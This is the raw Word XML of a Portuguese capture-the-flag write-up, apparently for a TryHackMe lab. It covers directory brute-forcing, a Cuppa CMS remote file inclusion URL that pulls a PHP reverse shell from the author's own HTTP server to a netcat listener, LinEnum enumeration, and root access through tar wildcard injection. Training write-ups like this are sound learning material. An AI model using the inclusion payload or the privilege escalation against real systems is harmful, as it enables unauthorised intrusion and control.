      <w:r w:rsidR="008405CE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gina. Por</w:t>
      </w:r>
      <w:r w:rsidR="008405CE"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m ela não tem nenhuma informa</w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>çã</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o importante, rodo um gobuster mais uma vez para encontrar novos diret</w:t>
      </w:r>
      <w:r w:rsidR="008405C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rios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7EB28A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52" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="7B70B138" wp14:editId="2D4BB60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639820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="21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9405FE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62" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="4C9391D9" wp14:editId="544F011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82190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="2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B69B0C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E66D090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95BD671" w14:textId="03DBD1BE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Indo no diret</w:t>
      </w:r>
      <w:r w:rsidR="008405C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rio de administrador, me encontro com a seguinte p</w:t>
      </w:r>
      <w:r w:rsidR="008405CE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 xml:space="preserve">gina. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733E7461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E03AA72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63" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="75EA4963" wp14:editId="380E60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744595"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="2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AE9EF9" w14:textId="56334D27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Indo ao ExploitDB, encontro uma vulnerabilidade do Cuppa CMS onde utilizando um query espec</w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial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fico consigo rodar remote file inclusion utilizando um shell php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F157BD8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http://IP/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=SERVIDOR-HTTP/php-reverse-shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163CC897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isso, primeiro vou iniciar um servidor http com python para que eu possa fazer um get do meu shell, adicionalmente ativo um nc para escutar na porta escolhida.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E80865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54" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="1A92A95F" wp14:editId="07786B18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400040" cy="1211580"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="2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96E5BB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anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="53" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="31B1396F" wp14:editId="76F516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875790"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="25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F80502" w14:textId="456EA623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Entrando na m</w:t>
      </w:r>
      <w:r w:rsidR="008405CE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quina, come</w:t>
      </w:r>
      <w:r w:rsidR="008405CE"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z w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o a andar pelos diret</w:t>
      </w:r>
      <w:r w:rsidR="008405C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rios, encontro a user flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E501E8" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0086F594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55" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="3363F85C" wp14:editId="1D3BAA2E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>646430</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-74295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3867150" cy="4772025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77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87EF81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DFBFF4D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77E37AA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02A56FD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35806C6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3088BC1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9E6634C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67C41EF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7FA5A2C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A6216A2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00B3E16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A59A7EF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C8C62C7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0B635CD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93AB437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C208B69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790E986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0" distR="0" simplePos="0" relativeHeight="64" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14FC6880" wp14:editId="3241BC69">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>723265</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-31750</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2390775" cy="171450"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27" name="Text 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6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67C47D" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                              </w:rPr>
                              <w:t>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX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FC6880" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Frame 1" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:56.95pt;margin-top:-2.5pt;width:188.25pt;height:13.5pt;z-index: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" filled="f" stroked="f" strokeweight="0">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4C67C47D" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        </w:rPr>
                        <w:t>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5BA43A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B82A25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735CEFF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652C25C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FF72654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786355C" w14:textId="77777777" w:rsidR="00126C16" w:rsidRPr="004225B7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4225B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lastRenderedPageBreak/>
        <w:t>What is the root flag?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BA0A40" w14:textId="6174ADAE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Indo para tmp, consigo adicionar arquivos na m</w:t>
      </w:r>
      <w:r w:rsidR="008405CE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quina, assim utilizo o meu servidor http e dou um get no script LinEnum.sh, capaz de fazer uma enumera</w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>çã</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56280E71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56" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="1EE5CDAE" wp14:editId="71105543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400040" cy="4333875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="28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BEF30B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D7EDFB7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57" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="1AA3EF5E" wp14:editId="1E229E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5400" cy="1276350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="29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59267A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225FC9A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6585119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anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="58" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="312FF42D" wp14:editId="17B73B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744595"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="30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2C0BEB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5D1F60F" w14:textId="19E36409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Porem, não encontro nenhuma informa</w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>çã</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o que posso usar. Depois disso, volto para o diretorio milesdyson para ver se encontro algo que possa me ajudar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D9866C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E06C96F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60" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="6B701066" wp14:editId="45321BA8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4743450" cy="2609850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"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0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6A65E5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DD3A901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C0768A7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346879D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3CD6DAD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AF53EF2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D7C8D20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E3EDBD8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C84B16F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9979922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7DA94D4" w14:textId="30B87BC6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Descubro esse script. Vou para o diret</w:t>
      </w:r>
      <w:r w:rsidR="008405C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rio rodando tar e rodar sudo, por</w:t>
      </w:r>
      <w:r w:rsidR="008405CE"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 xml:space="preserve">m não consigo por conta do erro de tty. Para resolver, importo uma shell utilizando python. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078C5CF0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ED62773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anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="61" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="2E5BC696" wp14:editId="11DE38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4850" cy="1533525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"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5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B42C75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31A81DB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AF4AA58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737A824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D3A536E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19F8173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F35CE1F" w14:textId="013BE42A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Descubro uma vulnerabilidade de wildcards do tar no Linux, onde ao usar * com tar, os arquivos vao ser passados para o bin</w:t>
      </w:r>
      <w:r w:rsidR="008405CE"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rio do tar e os comandos que eu utilizar vao ser executados como root. Encontro a flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E31880D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0" distR="0" simplePos="0" relativeHeight="65" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1519BA45" wp14:editId="170BB798">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-285115</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1630680</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1675765" cy="171450"/>
                <wp:effectExtent l="1270" t="13970" r="1905" b="13335"/>
                <wp:wrapNone/>
                <wp:docPr id="33" name="Text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543600">
                          <a:off x="0" y="0"/>
                          <a:ext cx="167580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DC00C8D" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                            </w:pPr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>XXXXXXXXXXXXXXXXXXXXX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9BA45" id="Text Frame 2" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:-22.45pt;margin-top:128.4pt;width:131.95pt;height:13.5pt;rotation:-61604fd;z-index:6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" filled="f" stroked="f" strokeweight="0">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7DC00C8D" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        </w:rPr>
                        <w:t>XXXXXXXXXXXXXXXXXXXXX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anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="59" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="378F037B" wp14:editId="0485678B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-342900</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>100965</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5987415" cy="1871345"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="34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187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3D4040" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16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1D6B5D0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t3h5sf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7509A8E0" w14:textId="39FDFECB" w:rsidR="00126C16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foi uma </w:t>
      </w:r>
      <w:r w:rsidR="008405C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tima oportunidade para treinar meus conhecimentos em Privilege escalation e exploitation de vulnerabilidades. Tamb</w:t>
      </w:r>
      <w:r w:rsidR="008405CE"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m tive a oportunidade de descobrir outras ferramentas do Kali como smbmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA0A20C" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00000000">
      <w:pP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3" w:name="_heading=h.4d34og8"/>
      <w:bookmarkEnd w:id="3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437565D3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hyperlink r:id="rId38">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/?ref=blog.tryhackme.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="09D023BA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hyperlink r:id="rId39">
        <w:r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</w:p>
    <w:p w14:paraId="10F74268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hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="78BB4D38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hyperlink r:id="rId41">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://medium.com/@uukail2005/samba-smbd-3-x-4-x-exploitation-59a8d9431ea1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="448E5B73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hyperlink r:id="rId42">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://tldp.org/HOWTO/SMB-HOWTO-8.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2457193B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hyperlink r:id="rId43">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://github.com/CuppaCMS/CuppaCMS/issues/33</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C6FA6BA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hyperlink r:id="rId44">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/25971</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="225C138D" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId45">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://github.com/rebootuser/LinEnum</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4166C3DE" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00126C16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1417" w:right="1701" w:bottom="1417" w:left="1701" w:header="708" w:footer="261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7C7583" w14:textId="77777777" w:rsidR="00D77CC7" w:rsidRDefault="00D77CC7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6D7534FA" w14:textId="77777777" w:rsidR="00D77CC7" w:rsidRDefault="00D77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70CD845-2878-4303-9840-F93BEAD1D24F}"/>
    <w:embedBold r:id="rId2" w:fontKey="{A3B079DD-6C62-47D0-B608-671D90AA8224}"/>
    <w:embedItalic r:id="rId3" w:fontKey="{809BDC67-A7D3-4E99-AE0D-AE4A0CC979D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1CEA3AE-4E7A-40A9-BA84-3806D49E29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embedRegular r:id="rId5" w:fontKey="{F4C83F15-12B5-4FB0-ACA2-0FAD01528032}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  <w:embedRegular r:id="rId6" w:fontKey="{89FD7149-9139-4939-B6D9-3216F2FEC53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jaVu San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75B75" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00000000">
    <w:pP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E7A08E" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C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4C7AF" w14:textId="77777777" w:rsidR="00D77CC7" w:rsidRDefault="00D77CC7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3F18CECD" w14:textId="77777777" w:rsidR="00D77CC7" w:rsidRDefault="00D77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0F9E46" w14:textId="77777777" w:rsidR="00126C16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rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:b/>
        <w:noProof/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="16" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="54F5B97D" wp14:editId="71D9D257">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-1476375</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-447675</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="10943590" cy="542925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image1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943590" cy="5429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noProof/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="31" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4C673CF4" wp14:editId="2F9A4577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0" b="0"/>
          <wp:wrapNone/>
          <wp:docPr id="36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87503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3337A452" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4252"/>
        <w:tab w:val="right" w:pos="8504"/>
      </w:tabs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E47129" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C1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26C16"/>
    <w:rsid w:val="00126C16"/>
    <w:rsid w:val="004225B7"/>
    <w:rsid w:val="008405CE"/>
    <w:rsid w:val="00A01938"/>
    <w:rsid w:val="00D7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C1D02"/>
  <w15:docId w15:val="{E4F338D6-322C-40F6-B8F7-B08B0DA26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ptos Display" w:hAnsi="Aptos Display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hAnsi="Aptos Display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iCs/>
      <w:color w:val="595959" w:themeColor="dark1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading7Char"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="dark1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading8Char"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="dark1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading9Char"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="272727" w:themeColor="dark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Pr>
      <w:rFonts w:ascii="Aptos Display" w:eastAsia="Aptos" w:hAnsi="Aptos Display" w:cs="Aptos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qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos Display" w:eastAsia="Aptos" w:hAnsi="Aptos Display" w:cs="Aptos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qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Aptos" w:cs="Aptos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qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Aptos" w:cs="Aptos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qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Aptos" w:cs="Aptos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qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Aptos" w:cs="Aptos"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="dark1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading7"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Aptos" w:cs="Aptos"/>
      <w:color w:val="595959" w:themeColor="dark1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading8"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Aptos" w:cs="Aptos"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="dark1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Aptos" w:cs="Aptos"/>
      <w:color w:val="272727" w:themeColor="dark1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos Display" w:eastAsia="Aptos" w:hAnsi="Aptos Display" w:cs="Aptos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qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Aptos" w:cs="Aptos"/>
      <w:color w:val="595959" w:themeColor="dark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qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="dark1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat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qFormat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qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TtuloGuardianChar">
    <w:name w:val="Título [Guardian] Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="TtuloGuardian"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubttuloGuardianChar">
    <w:name w:val="Subtítulo [Guardian] Char"/>
    <w:basedOn w:val="TtuloGuardianChar"/>
    <w:link w:val="SubttuloGuardian"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="24"/>
      <w:szCs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ptos Display" w:hAnsi="Aptos Display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paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="dark1" w:themeTint="BF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link w:val="FooterChar"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4252"/>
        <w:tab w:val="right" w:pos="8504"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/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qFormat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pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SubttuloGuardian">
    <w:name w:val="Subtítulo [Guardian]"/>
    <w:basedOn w:val="TtuloGuardian"/>
    <w:link w:val="SubttuloGuardianChar"/>
    <w:qFormat/>
    <w:pPr>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:pPr>
      <w:spacing w:after="100"/>
